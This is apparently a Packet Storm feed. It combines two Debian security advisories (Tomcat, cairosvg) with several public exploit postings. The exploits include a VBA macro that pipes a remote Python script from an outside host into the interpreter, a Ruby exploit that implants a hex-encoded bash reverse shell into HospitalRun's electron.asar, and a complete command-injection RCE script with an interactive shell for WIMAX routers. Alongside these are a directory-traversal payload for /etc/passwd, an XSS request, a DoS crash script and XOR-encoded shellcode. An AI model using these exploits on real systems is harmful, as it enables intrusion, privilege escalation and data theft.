Debian Linux Security Advisory 5381-1 - Several security vulnerabilities have been discovered in the Tomcat servlet and JSP engine.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5381-1                   security@debian.org  
https://www.debian.org/security/                          Markus Koschany  
April 05, 2023                        https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : tomcat9  
CVE ID         : CVE-2022-42252 CVE-2022-45143 CVE-2023-28708  
Debian Bug     : 1033475

Several security vulnerabilities have been discovered in the Tomcat  
servlet and JSP engine.

CVE-2022-42252

    Apache Tomcat was configured to ignore invalid HTTP headers via setting  
    rejectIllegalHeader to false. Tomcat did not reject a request containing an  
    invalid Content-Length header making a request smuggling attack possible if  
    Tomcat was located behind a reverse proxy that also failed to reject the  
    request with the invalid header.

CVE-2022-45143

    The JsonErrorReportValve in Apache Tomcat did not escape the type, message  
    or description values. In some circumstances these are constructed from  
    user provided data and it was therefore possible for users to supply values  
    that invalidated or manipulated the JSON output.

CVE-2023-28708

    When using the RemoteIpFilter with requests received from a reverse proxy  
    via HTTP that include the X-Forwarded-Proto header set to https, session  
    cookies created by Apache Tomcat did not include the secure attribute. This  
    could result in the user agent transmitting the session cookie over an  
    insecure channel.

For the stable distribution (bullseye), these problems have been fixed in  
version 9.0.43-2~deb11u6.

We recommend that you upgrade your tomcat9 packages.

For the detailed security status of tomcat9 please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/tomcat9

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEErPPQiO8y7e9qGoNf2a0UuVE7UeQFAmQt0zZfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEFD  
RjNEMDg4RUYzMkVERUY2QTFBODM1RkQ5QUQxNEI5NTEzQjUxRTQACgkQ2a0UuVE7  
UeTvzxAAhrAcR/ZgJwe/4qeekO90f4YaCAoJhq7Fq4K6Wj5yM8dllX1IgTy7sweC  
G/GLe62O5snepEI6Fjfy3exkKieSYvsinGxUUcn3CjPYgpLfEDrRGhpWY1y0NPhQ  
NC6iFud2yJIfqI0Ns6h6rhq3F1Blp8iqBWqQiNdEAnZR+jqgqw/qtfa2GbsMLwI2  
so5EZBS3I2of6dCdvS71z8h2Mwf6AbsJh9f96BzlbnNZbGGGp46aIq/VtBUGwrtq  
CA8jrBNtsRT4sMsNp/qqbwLJwkSUxrOqALmJT35FGx9UnZCRld/UNonDpOM85Kia  
GdWE9aJ/A8p+i7vOivNserDBplDnWqug+NygYBmDUigwWfn2mqFIZvBbnp7lQp1z  
udNdTrvSnBSvLSnFUk97Qk3+oTLIO5YtmtXoHCDcGoKe6BAUbe9VYvHDNCNSDfD+  
vu2nv4cLGtI7SKNRN64B7d44z/sDK6o3ymGZEI+HT8dNFTA702m1AuDl/P/Zms7I  
2WKewbQBYrPbLOZE7sreyK8r84EAWR6o4VFAI/pkggckiFWcwdBVVsn0AV1WbtKo  
Z0R6DBFeyaYNrNh8TUDomJRySrV3sft48b5fLBNm6TQUzuTjbRLO0wYVXGywIU45  
aafJ+8bOP9EjhEF+erSIW7/dMm07hODtSL5QymPQlvmDmq7JM7g=XJMU  
-----END PGP SIGNATURE-----

Debian Security Advisory 5381-1

Debian Linux Security Advisory 5382-1 - It was reported that cairosvg, a SVG converter based on Cairo, can send requests to external hosts when processing specially crafted SVG files with external file resource loading. An attacker can take advantage of this flaw to perform a server-side request forgery or denial of service. Fetching of external files is disabled by default with this update.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5382-1                   security@debian.orghttps://www.debian.org/security/                     Salvatore BonaccorsoApril 05, 2023                        https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : cairosvgCVE ID         : CVE-2023-27586Debian Bug     : 1033295It was reported that cairosvg, a SVG converter based on Cairo, can sendrequests to external hosts when processing specially crafted SVG fileswith external file resource loading. An attacker can take advantage ofthis flaw to perform a server-side request forgery or denial of service.Fetching of external files is disabled by default with this update.For the stable distribution (bullseye), this problem has been fixed inversion 2.5.0-1.1+deb11u1.We recommend that you upgrade your cairosvg packages.For the detailed security status of cairosvg please refer to itssecurity tracker page at:https://security-tracker.debian.org/tracker/cairosvgFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmQt1clfFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xNDz0SHSA/+JRGHd5ccJTCZWYjtXDsq3tjP77dofbJW24Q+jEa22iQNkHHaW+k7jA+0DupIu6apNuA8WoGbBYEA24zG0c/XplIKYC7N0e+23wrX0pbamNyENIkWtFKSeY0UnYcNCSD+rL3GasVKiUOvdaWk7PZqxgIU1+ORgnvDVUHY2BB15cEVDKAvcwIrd71KkU6JbGdAoufek30UszsyMTs+ULp00uErgzq3jrxnJ5NCAnj8i7sI+DGY/aqEkOFEgZi7gIRDkK68VPMxQAUFCB7n/vIsqFrJTdwJ3xIhaZixEXgbLr4TBY1VhqixljNijSq2A72lTqotiKbXLiBy8l2vf+9T1au9qhImMViN3Sr6NDm3mjc/2wQv8ECopMiXMsbaJOjS/Fslbzc6jleK+xvhwkpwqbOYd9eyhX5FEEGdzHRJR093dy7Rp1t58QIkjOw4gS5psq6YEDtcTwyA7CAUZpZ0KGPiaM9+sY68iFsIa/b3HKnkGD+/Xp727CZLStSTYx/LOB/VSGOhxmSxQMpVJ9UMcFoCFfq+4xij1losWprs4nbEa/4CsPWWYuL/eWuMywMvev9adj55x6voruJ2eKxFFiQ+wR2JcdKXY5oXqzNAfjKLLHPjzq2co0OsIJ9x3kAM9eCct13Iq1gsz4tuj3zJgI4458cci5iMiRKjwdsClAM=vgG/-----END PGP SIGNATURE-----

Debian Security Advisory 5382-1

Universal Media Server version 13.2.1 suffers from a cross site scripting vulnerability.

    # Exploit Title: Universal Media Server 13.2.1 Cross Site Scripting # Google Dork: NA# Date: 01/04/2023# Exploit Author: Yehia Elghaly - Mrvar0x# Vendor Homepage: https://www.universalmediaserver.com/# Software Link: https://www.universalmediaserver.com/download/# Version: 13.2.1# Tested on: Windows 7 / 10# CVE: N/ASummary: Universal Media Server is a free DLNA, UPnP and HTTP/S Media Server.Support all major operating systems, with versions for Windows, Linux and macOS.Description: The attacker can able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.: Reflected XSS found on the follwoing paths GET /%3Cscript%3Ealert('XSSYF')%3C/script%3E HTTP/1.1Host: 172.16.110.132:9001User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/111.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1[Affected Component]//about/accounts/actions/logs/player/settings/shared/v1/api/about/|echo

Universal Media Server 13.2.1 Cross Site Scripting

BulletProof FTP Server version 2019.0.0.51 suffers from a denial of service vulnerability.

    #Exploit Title: BulletProof FTP Server 2019.0.0.51 - Denial of Service#Discovery by: Yehia Elghaly - Mrvar0x#Discovery Date: 2023-03-31#Vendor Homepage: https://barcodemagic.com/#Software Link: http://bpftpserver.com/products/bpftpserver/windows/download#Tested Version: 2019.0.0.51#Tested on: Windows 7 x86 #Steps To Crash:#Run: BulletProof_FTP_Server_2019.0.0.51.py#Open poc.txt and copy content to clipboard#Open BulletProof FTP Server - Select "Settings" > "SMTP"#"Email Server" select "Username" and Paste Clipboard#Click on "Test" -----> Crashedbuffer = "A" * 300payload = buffertry:    f=open("Poc.txt","w")    print "[+] Creating %s evil payload.." %len(payload)    f.write(payload)    f.close()    print "[+] File created!"except:    print "File cannot be created"

BulletProof FTP Server 2019.0.0.51 Denial Of Service

Microsoft Excel suffers from a spoofing vulnerability.

    ## Title: Microsoft Excel Spoofing Vulnerability## Author: nu11secur1ty## Date: 04.06.2023## Vendor: https://www.microsoft.com/## Software: https://www.microsoft.com/en-us/microsoft-365/excel## Reference: https://www.rapid7.com/fundamentals/spoofing-attacks/## CVE-2023-23398## Description:The attack itself is carried out locally by a user with authenticationto the targeted system. An attacker could exploit the vulnerability byconvincing a victim, through social engineering, to download and opena specially crafted file from a website which could lead to a localattack on the victim's computer. The attacker can trick the victim toopen a malicious web page by using an Excel malicious file and he cansteal credentials, bank accounts information, sniffing and trackingall the traffic of the victim without stopping - it depends on thescenario and etc.STATUS: HIGH Vulnerability[+]Exploit:```vbsSub Check_your_salaries()CreateObject("Shell.Application").ShellExecute"microsoft-edge:http://192.168.100.96/"End Sub```[+]The victim Exploit + Curl Piping:## WARNING:The exploit server must be STREAMING at the moment when the victim hitthe button of the exploit!```vbsSub silno_chukane()  Call Shell("cmd.exe /S /c" & "curl -shttp://192.168.100.96/PoC/PoC.py | python", vbNormalFocus)End Sub```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-23398)## Reference:[href](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-23398)[href](https://www.rapid7.com/fundamentals/spoofing-attacks/)## Proof and Exploit[href](https://streamable.com/n5qp4q)## Proof and Exploit[href](https://streamable.com/u2wxzz)## Time spend:01:37:00

Microsoft Excel Spoofing

Mitel MiCollab AWV versions 8.1.2.4 and 9.1.3 suffers from a directory traversal and local file inclusion vulnerabilities.

    # Exploit Title: Mitel MiCollab AWV 8.1.2.4 and 9.1.3 - Directory Traversal and LFI# Date: 2022-10-14# Fix Date: 2020-05# Exploit Author: Kahvi-0# Github: https://github.com/Kahvi-0# Vendor Homepage: https://www.mitel.com/# Vendor Security Advisory: https://www.mitel.com/support/security-advisories/mitel-product-security-advisory-20-0005# Version: before 8.1.2.4 and 9.x before 9.1.3# CVE: CVE-2020-11798# CVE Reported By: Tri BuiDescription:A Directory Traversal vulnerability in the web conference component of Mitel MiCollab AWV before 8.1.2.4 and 9.x before 9.1.3 could allow an attacker to access arbitrary files from restricted directories of the server via a crafted URL, due to insufficient access validation. A successful exploit could allow an attacker to access sensitive information from the restricted directoriesPayload:https://[site]/awcuser/cgi-bin/vcs_access_file.cgi?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd

Mitel MiCollab AWV 8.1.2.4 / 9.1.3 Directory Traversal / LFI

Unified Remote version 3.13.0 suffers from a remote code execution vulnerability.

Unified Remote 3.13.0 Remote Code Execution

HospitalRun version 1.0.0-beta local root exploit for macOS.

    # Exploit Title: HospitalRun  1.0.0-beta - Local Root Exploit for macOS# Written by Jean Pereira <info@cytres.com># Date: 2023/03/04# Vendor Homepage: https://hospitalrun.io# Software Link: https://github.com/HospitalRun/hospitalrun-frontend/releases/download/1.0.0-beta/HospitalRun.dmg# Version: 1.0.0-beta# Tested on: macOS Ventura 13.2.1 (22D68)# Impact: Command Execution, Privilege Escalation# Instructions:# Run local TCP listener with (e.g. nc -l 2222)# Run exploit# Wait for HospitalRun to be executed# Profit (privileged rights e.g. root are gained)# Hotfix: Remove write permissions from electron.asar to patch this vulnerability# Exploit:buffer =  "\x63\x6F\x6E\x73\x74\x20\x72\x65\x6E" +          "\x64\x65\x72\x50\x72\x6F\x63\x65\x73" +          "\x73\x50\x72\x65\x66\x65\x72\x65\x6E" +          "\x63\x65\x73\x20\x3D\x20\x70\x72\x6F" +          "\x63\x65\x73\x73\x2E\x61\x74\x6F\x6D" +          "\x42\x69\x6E\x64\x69\x6E\x67\x28\x27" +          "\x72\x65\x6E\x64\x65\x72\x5F\x70\x72" +          "\x6F\x63\x65\x73\x73\x5F\x70\x72\x65" +          "\x66\x65\x72\x65\x6E\x63\x65\x73\x27" +          "\x29\x2E\x66\x6F\x72\x41\x6C\x6C\x57" +          "\x65\x62\x43\x6F\x6E\x74\x65\x6E\x74" +          "\x73\x28\x29"payload = "\x72\x65\x71\x75\x69\x72\x65\x28\x22" +          "\x63\x68\x69\x6C\x64\x5F\x70\x72\x6F" +          "\x63\x65\x73\x73\x22\x29\x2E\x65\x78" +          "\x65\x63\x53\x79\x6E\x63\x28\x22\x2F" +          "\x62\x69\x6E\x2F\x62\x61\x73\x68\x20" +          "\x2D\x63\x20\x27\x65\x78\x65\x63\x20" +          "\x62\x61\x73\x68\x20\x2D\x69\x20\x3E" +          "\x2F\x64\x65\x76\x2F\x74\x63\x70\x2F" +          "\x30\x2E\x30\x2E\x30\x2E\x30\x2F\x32" +          "\x32\x32\x32\x20\x30\x3E\x26\x31\x27" +          "\x22\x29"nopsled = "\x2F\x2A\x2A\x2A\x2A" +          "\x2A\x2A\x2A\x2A\x2F"File.open("/Applications/HospitalRun.app/Contents/Resources/electron.asar", "rb+") do |file|  electron = file.read  electron.gsub!(buffer, payload + nopsled)  file.pos = 0  file.write(electron)end

HospitalRun 1.0.0-beta macOS Local Root

WIMAX SWC-5100W suffers from an authenticated remote command execution vulnerability.

    # Exploit Title: WIMAX SWC-5100W Firmware V(1.11.0.1 :1.9.9.4) - Authenticated RCE# Vulnerability Name: Ballin' Mada# Date: 4/3/2023# Exploit Author: Momen Eldawakhly (Cyber Guy)# Vendor Homepage: http://www.seowonintech.co.kr/eng/main# Version: Bootloader(1.18.19.0) , HW (0.0.7.0), FW(1.11.0.1 : 1.9.9.4)# Tested on: Unix# CVE : Under registrationimport requestsimport random,argparseimport sysfrom colorama import Forefrom bs4 import BeautifulSoupred = Fore.REDgreen = Fore.GREENcyan = Fore.CYANyellow = Fore.YELLOWreset = Fore.RESETargParser = argparse.ArgumentParser()argParser.add_argument("-t", "--target", help="Target router")argParser.add_argument("-rv", "--reverseShell", help="Obtain reverse shell", action='store_true')argParser.add_argument("-tx", "--testExploit", help="Test exploitability", action='store_true')args = argParser.parse_args()target = args.targetrev = args.reverseShelltestX = args.testExploitbanner = """ ____ ____ ____ ____ ____ ____ ____ _________ ____ ____ ____ ____ ||B |||a |||l |||l |||i |||n |||' |||       |||M |||a |||d |||a ||||__|||__|||__|||__|||__|||__|||__|||_______|||__|||__|||__|||__|||/__\|/__\|/__\|/__\|/__\|/__\|/__\|/_______\|/__\|/__\|/__\|/__\|                    RCE 0day in WIMAX SWC-5100W                 [ Spell the CGI as in Cyber Guy ]"""def checkEXP():    print(cyan + "[+] Checking if target is vulnerable" + reset)    art = ['PWNED_1EE7', 'CGI AS IN CYBER GUY']    request = requests.get(url = f"http://{target}/cgi-bin/diagnostic.cgi?action=Apply&html_view=ping&ping_count=10&ping_ipaddr=;echo 'PUTS("+random.choice(art)+")';", proxies=None)    if request.status_code == 200:        print(green + "[+] Status code: 200 success" + reset)        soup = BeautifulSoup(request.text, 'html.parser')         if soup.get_text(" ").find("PWNED_1EE7") < 0 or soup.get_text(" ").find("CGI AS IN CYBER GUY"):            print(green + "[+] Target is vulnerable" + reset)            uname = requests.get(url = f"http://{target}/cgi-bin/diagnostic.cgi?action=Apply&html_view=ping&ping_count=10&ping_ipaddr=;echo+\"<a+id='pwned'>[*] Kernel: `uname+-a` -=-=- [*] Current directory: `pwd` -=-=- [*] User: `whoami`</a>\";")            soup_validate = BeautifulSoup(uname.text, 'html.parser')            print(soup_validate.find(id="pwned").text)        else:            print(red + "[+] Seems to be not vulnerable" + reset)    else:        print(red + "[+] Status code: " + str(request.status_code) + reset)def revShell():    cmd = input("CGI #:- ")    while cmd:        try:            print(cmd)            uname = requests.get(url = f"http://{target}/cgi-bin/diagnostic.cgi?action=Apply&html_view=ping&ping_count=10&ping_ipaddr=;echo+\"<a+id='result'>`{cmd}`</a>\";")            resp = BeautifulSoup(uname.text, 'html.parser')            print(resp.find(id="result").text)            if cmd == "exit" or cmd == "quit":                print(yellow + "[*] Terminating ..." + reset)                sys.exit(0)            else:                return revShell()        except KeyboardInterrupt:            sys.exit(0)def help():    print(    """ [+] Example: python3 pwnMada.py -t 192.168.1.1 -rv[*] -t, --target :: Specify target to attack.[*] -rv, --reverseShell :: Obtain reverse shell.[*] -tx, --testExploit :: Test the exploitability of the target.[*] -fz, --fuzz :: Fuzz the target with arbitrary chars.    """    )    if target and rev:    print(banner)    revShell()elif target and testX:    print(banner)    checkEXP()else:    print(banner)    argParser.print_help()

WIMAX SWC-5100W Remote Command Execution

71 bytes small Linux/x86_64 bash shellcode with XOR encoding.

    Exploit Title: Linux/x86_64 - bash shellcode with xor encodingDate: 05/02/2023Exploit Author: Jeenika AnadaniContact: https://twitter.com/cyber_jeeniCategory: ShellcodeArchitectue: Linux x86_64Shellcode Length: 71 Bytes-----------------------section .datasection .text  global _start_start:  ; set up argv and envp arrays for execve()  xor rax, rax  mov [rsp-8], rax  mov qword [rsp-16], 0x72613162 ; encrypted 'bash'  xor byte [rsp-16], 0x08  xor byte [rsp-15], 0x16  xor byte [rsp-14], 0x24  xor byte [rsp-13], 0x32  lea rdx, [rsp-16]  mov qword [rsp-24], rdx  mov qword [rsp-32], rdx  lea rdi, [rsp-32]  ; call execve()  xor eax, eax  mov al, 59  syscall  ; exit with status code 0  xor eax, eax  mov ebx, eax  mov al, 60  syscall-----------#### Explanation:This code uses XOR encryption to obscure the name of the program being executed, `"bash"`. The XOR encryption key is `0x08162432`, which is applied to each byte of the string. The decryption is performed just before calling `execve`, so the program name is passed in its original form.The rest of the code is the same as the previous example, making a system call to the `execve` function and then calling the `exit` syscall to terminate the process.---------### Compilation AND Execution:To run the x86_64 assembly code on a Linux system, you need to assemble it into an executable file and then run the file. Here are the steps:1.  Save the code to a file with a `.asm` extension, for example `bash.asm`.   2.  Assemble the code into an object file using an assembler, such as NASM:  `nasm -f elf64 -o bash.o bash.asm`The `-f elf64` option specifies that the output format should be ELF64 (Executable and Linkable Format), and the `-o` option specifies the name of the output file, `bash.o`.    3.  Link the object file to produce an executable file using the `ld` linker:  `ld -s -o bash bash.o`The `-s` option removes the symbol table from the output file to make it smaller, and the `-o` option specifies the name of the output file, `bash`.    4. Make the file executable:  `chmod +x bash`5. Finally, you can run the file:  `./bash`---------------------

Source

Packet Storm